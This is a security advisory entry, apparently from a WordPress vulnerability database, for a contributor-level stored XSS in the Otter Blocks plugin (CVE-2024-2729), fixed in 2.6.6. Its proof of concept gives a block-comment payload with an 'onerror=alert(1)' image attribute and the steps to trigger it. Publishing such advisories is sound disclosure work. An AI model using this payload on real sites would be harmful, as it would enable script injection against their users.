Otter Blocks < 2.6.6 – Contributor+ Stored XSS | CVE 2024-2729 | Plugin Vulnerabilities

Description

The plugin does not properly escape its mainHeadings blocks' attribute before appending it to the final rendered block, allowing contributors to conduct Stored XSS attacks.

Proof of Concept

As a contributor, put the following payload in a post while in Code Editor mode

<!-- wp:themeisle-blocks/review {"id":"wp-block-themeisle-blocks-review-b973b49a","title":"123","mainHeading":"img src=x onerror=alert(1) style=width:150px;","className":""} /-->

The XSS will be triggered when viewing/prevewing the post

Affects Plugins

Fixed in 2.6.6

References

CVE

URL

https://research.cleantalk.org/cve-2024-2729/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

Miscellaneous

Original Researcher

Dmitrii Ignatyev

Submitter

Dmitrii Ignatyev

Submitter website

https://research.cleantalk.org

Verified

Yes

WPVDB ID

5014f886-020e-49d1-96a5-2159eed8ba14

Timeline

Publicly Published

2024-03-28 (about 1 months ago)

Added

2024-03-28 (about 1 months ago)

Last Updated

2024-04-01 (about 1 months ago)

Other

Published

Title

Published

2023-05-12

Title

WP Register Profile With Shortcode < 3.5.9 - Admin+ Stored XSS

Published

2015-02-22

Title

FancyBox for WordPress 3.0.0-3.0.2 - Stored Cross-Site Scripting (XSS)

Published

2021-09-09

Title

DJ EmailPublish <= 1.7.2 - Reflected Cross-Site Scripting

Published

2014-08-01

Title

Springboard Video Quick Publish 0.2.6 - sb_search.php paged Parameter Reflected XSS

Published

2024-04-22

Title

WP Media Category Management < 2.3.0 - Reflected Cross-Site Scripting